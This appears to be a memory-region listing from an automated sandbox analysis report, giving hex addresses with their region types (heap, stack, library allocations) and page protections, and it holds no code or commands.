27FA000
trusted library allocation
page read and write
319E000
stack
page read and write
331C000
heap
page read and write
47A4000
trusted library allocation
page read and write
860E000
trusted library allocation
page read and write
3FE000
heap
page read and write
10000000
unkown
page readonly
587000
heap
page read and write
1F97000
trusted library allocation
page read and write
3DC000
heap
page read and write
2E16000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
59A000
heap
page read and write
2F2E000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
332A000
heap
page read and write
2D0000
heap
page read and write
853E000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
37F000
heap
page read and write
334A000
heap
page read and write
4798000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
7FF00142000
trusted library allocation
page execute and read and write
335C000
heap
page read and write
850000
heap
page read and write
34C3000
trusted library allocation
page read and write
844000
trusted library allocation
page read and write
90EE000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
44ED000
heap
page read and write
3372000
heap
page read and write
24B0000
heap
page read and write
26A0000
heap
page read and write
10057000
unkown
page read and write
1D64000
trusted library allocation
page read and write
1F85000
trusted library allocation
page read and write
15C000
stack
page read and write
5F5000
heap
page read and write
23BE000
trusted library allocation
page read and write
160000
heap
page read and write
2C9B000
trusted library allocation
page read and write
2EFF000
trusted library allocation
page read and write
1CC000
stack
page read and write
346E000
trusted library allocation
page read and write
24B0000
trusted library allocation
page read and write
200000
heap
page read and write
47A4000
trusted library allocation
page read and write
700000
heap
page read and write
1F9B000
trusted library allocation
page read and write
51C000
heap
page read and write
2210000
heap
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
3354000
heap
page read and write
2FE0000
trusted library allocation
page read and write
2682000
trusted library section
page read and write
1FA1000
trusted library allocation
page read and write
22C0000
trusted library allocation
page read and write
33B7000
heap
page read and write
10000000
unkown
page readonly
2C9B000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
266C000
stack
page read and write
223000
trusted library allocation
page read and write
348D000
trusted library allocation
page read and write
23D000
stack
page read and write
47B0000
trusted library allocation
page read and write
3E0000
heap
page read and write
24C0000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
440000
heap
page read and write
3F0000
heap
page read and write
33EF000
heap
page read and write
1A3000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
33B3000
heap
page read and write
1F95000
trusted library allocation
page read and write
1F9A000
trusted library allocation
page read and write
2E6F000
trusted library allocation
page read and write
2F18000
trusted library allocation
page read and write
2E55000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
334A000
heap
page read and write
925E000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
3372000
heap
page read and write
3316000
heap
page read and write
1D64000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
250000
heap
page read and write
47A4000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
44ED000
heap
page read and write
47A4000
trusted library allocation
page read and write
1B974000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
303D000
trusted library allocation
page read and write
23B2000
trusted library allocation
page read and write
1B9A0000
remote allocation
page read and write
3315000
heap
page read and write
236C000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
10046000
unkown
page readonly
2A59000
heap
page read and write
1DA7000
trusted library allocation
page read and write
554000
heap
page read and write
910000
heap
page read and write
1DA4000
trusted library allocation
page read and write
1CEF0000
heap
page read and write
33B5000
heap
page read and write
27B0000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
33DD000
heap
page read and write
339D000
heap
page read and write
26BD000
trusted library allocation
page read and write
33EF000
heap
page read and write
2910000
trusted library allocation
page read and write
7FF00100000
trusted library allocation
page read and write
33F6000
trusted library allocation
page read and write
10046000
unkown
page readonly
A70000
trusted library allocation
page read and write
8DBE000
trusted library allocation
page read and write
1EB000
stack
page read and write
2E16000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
33A2000
heap
page read and write
758000
heap
page read and write
3325000
heap
page read and write
2E0E000
trusted library allocation
page read and write
1B8000
heap
page read and write
7FF00220000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
AD4000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
24D0000
heap
page read and write
3088000
trusted library allocation
page read and write
2A3D000
heap
page read and write
332B000
heap
page read and write
33DE000
heap
page read and write
1DA4000
trusted library allocation
page read and write
352E000
trusted library allocation
page read and write
338E000
heap
page read and write
2BC0000
trusted library allocation
page read and write
2A6D000
stack
page read and write
10053000
unkown
page read and write
5A4000
heap
page read and write
44B5000
heap
page read and write
3BA000
heap
page read and write
29F0000
heap
page read and write
2E62000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page execute and read and write
26BD000
trusted library allocation
page read and write
23B1000
trusted library allocation
page read and write
12B81000
trusted library allocation
page read and write
26AB000
stack
page read and write
4A0000
trusted library allocation
page read and write
7FF001D0000
trusted library allocation
page read and write
34B6000
trusted library allocation
page read and write
222D000
stack
page read and write
897E000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
10057000
unkown
page read and write
1DA4000
trusted library allocation
page read and write
8D6E000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
23C4000
trusted library allocation
page read and write
2DC9000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
2370000
trusted library allocation
page execute
2E16000
trusted library allocation
page read and write
497000
heap
page read and write
3379000
heap
page read and write
8FDE000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
26B0000
trusted library allocation
page read and write
2750000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
2AD7000
heap
page read and write
1D0000
trusted library allocation
page read and write
33B7000
heap
page read and write
897E000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
33B5000
heap
page read and write
357000
heap
page read and write
1F8A000
trusted library allocation
page read and write
2924000
trusted library allocation
page execute
3080000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
32FF000
stack
page read and write
2E60000
trusted library allocation
page read and write
356000
heap
page read and write
6740000
heap
page read and write
32BA000
trusted library allocation
page read and write
25FA000
heap
page execute and read and write
332C000
heap
page read and write
38D000
heap
page read and write
2E9E000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
3173000
trusted library allocation
page read and write
13E000
heap
page read and write
2C9B000
trusted library allocation
page read and write
2EE7000
trusted library allocation
page read and write
2B00000
trusted library allocation
page read and write
299E000
stack
page read and write
2770000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
270000
heap
page read and write
10046000
unkown
page readonly
C63000
trusted library allocation
page read and write
410000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
7FF00050000
trusted library allocation
page read and write
14E000
heap
page read and write
2770000
trusted library allocation
page read and write
1D7000
heap
page read and write
2510000
heap
page read and write
1DA4000
trusted library allocation
page read and write
1F89000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
3AD000
stack
page read and write
1DA7000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
332F000
heap
page read and write
3050000
trusted library allocation
page read and write
10057000
unkown
page read and write
28B000
stack
page read and write
925E000
trusted library allocation
page read and write
338F000
heap
page read and write
B00000
heap
page read and write
23F0000
heap
page read and write
23BA000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
250000
heap
page read and write
23C6000
trusted library allocation
page read and write
290F000
stack
page read and write
2770000
trusted library allocation
page read and write
7FF00102000
trusted library allocation
page execute and read and write
349D000
trusted library allocation
page read and write
14C000
heap
page read and write
1F97000
trusted library allocation
page read and write
2FA000
stack
page read and write
47A4000
trusted library allocation
page read and write
7FF002B0000
trusted library allocation
page execute and read and write
2C9B000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
3342000
heap
page read and write
23B0000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
290000
trusted library allocation
page read and write
3FE000
heap
page read and write
26C0000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page execute and read and write
1DA7000
trusted library allocation
page read and write
46A0000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
2E01000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
33C8000
heap
page read and write
843E000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
354000
trusted library allocation
page read and write
370000
trusted library allocation
page read and write
108000
heap
page read and write
1DA7000
trusted library allocation
page read and write
464000
heap
page read and write
1D90000
trusted library allocation
page read and write
2B20000
trusted library allocation
page read and write
8FDE000
trusted library allocation
page read and write
44E7000
heap
page read and write
236C000
trusted library allocation
page read and write
1D8B000
heap
page read and write
542000
heap
page read and write
1DA7000
trusted library allocation
page read and write
23C0000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
8D6E000
trusted library allocation
page read and write
1B960000
trusted library allocation
page read and write
2DD2000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
2EAE000
trusted library allocation
page read and write
33B3000
heap
page read and write
484000
trusted library section
page readonly
20D000
heap
page read and write
750000
heap
page read and write
1D90000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
2A5D000
stack
page read and write
33C7000
heap
page read and write
1DA7000
trusted library allocation
page read and write
2450000
heap
page read and write
47B0000
trusted library allocation
page read and write
641000
heap
page read and write
2644000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
44A0000
heap
page read and write
930000
heap
page read and write
23C6000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
339D000
heap
page read and write
1F97000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
381000
heap
page read and write
3128000
trusted library allocation
page read and write
8FAE000
trusted library allocation
page read and write
1B970000
trusted library allocation
page read and write
30C1000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
10000000
unkown
page readonly
568000
heap
page read and write
3A0000
heap
page read and write
843000
trusted library allocation
page read and write
348A000
trusted library allocation
page read and write
1BD000
stack
page read and write
1DA4000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
304F000
stack
page read and write
33DD000
heap
page read and write
2630000
trusted library allocation
page read and write
2BB5000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
2DE5000
trusted library allocation
page read and write
1F92000
trusted library allocation
page read and write
2620000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
23DD000
trusted library allocation
page read and write
338E000
heap
page read and write
29F4000
heap
page read and write
447000
heap
page read and write
1D90000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
2F2B000
trusted library allocation
page read and write
539000
heap
page read and write
3190000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
1B9A0000
remote allocation
page read and write
26C0000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
349A000
trusted library allocation
page read and write
338000
heap
page read and write
2E13000
trusted library allocation
page read and write
4C3000
trusted library allocation
page read and write
2DE6000
trusted library allocation
page read and write
1F83000
trusted library allocation
page read and write
500000
heap
page read and write
25E4000
trusted library allocation
page read and write
858E000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
23DD000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
3DC000
heap
page read and write
7C0000
trusted library allocation
page read and write
290000
heap
page read and write
2E60000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
354000
heap
page read and write
2FE4000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
2590000
trusted library allocation
page read and write
33A4000
heap
page read and write
1005A000
unkown
page readonly
6749000
heap
page read and write
33A9000
heap
page read and write
2E16000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
784000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
23DD000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
32F0000
heap
page read and write
2470000
heap
page read and write
2EC9000
trusted library allocation
page read and write
7FF00190000
trusted library allocation
page execute and read and write
47A4000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
24C0000
trusted library allocation
page read and write
10000000
unkown
page readonly
33A9000
heap
page read and write
7140000
heap
page read and write
47D000
heap
page read and write
2770000
trusted library allocation
page read and write
840E000
trusted library allocation
page read and write
AF4000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
2E6B000
trusted library allocation
page read and write
872000
heap
page read and write
10000000
unkown
page readonly
2E16000
trusted library allocation
page read and write
44D2000
heap
page read and write
33B3000
heap
page read and write
2C9B000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
440000
heap
page read and write
900E000
trusted library allocation
page read and write
2DE4000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
10000000
unkown
page readonly
860E000
trusted library allocation
page read and write
33AE000
heap
page read and write
8FAE000
trusted library allocation
page read and write
10057000
unkown
page read and write
2DF0000
trusted library allocation
page read and write
10053000
unkown
page read and write
47A4000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
530000
heap
page read and write
25A0000
heap
page read and write
1D81000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
2F1B000
trusted library allocation
page read and write
379000
heap
page read and write
3355000
heap
page read and write
2410000
heap
page read and write
354000
heap
page read and write
514000
trusted library allocation
page read and write
90AE000
trusted library allocation
page read and write
257F000
stack
page read and write
33B7000
heap
page read and write
26C0000
trusted library allocation
page read and write
915E000
trusted library allocation
page read and write
1F90000
trusted library allocation
page read and write
2DED000
trusted library allocation
page read and write
330E000
heap
page read and write
2E5E000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
140000
heap
page read and write
305A000
trusted library allocation
page read and write
10053000
unkown
page read and write
3329000
heap
page read and write
26BD000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
22A0000
trusted library allocation
page read and write
618000
heap
page read and write
537000
heap
page read and write
10000000
unkown
page readonly
2613000
trusted library allocation
page read and write
2C3C000
stack
page read and write
1D81000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2460000
heap
page read and write
438F000
stack
page read and write
65D000
heap
page read and write
7FF00210000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
478000
heap
page read and write
There are 1622 hidden memdumps, click here to show them.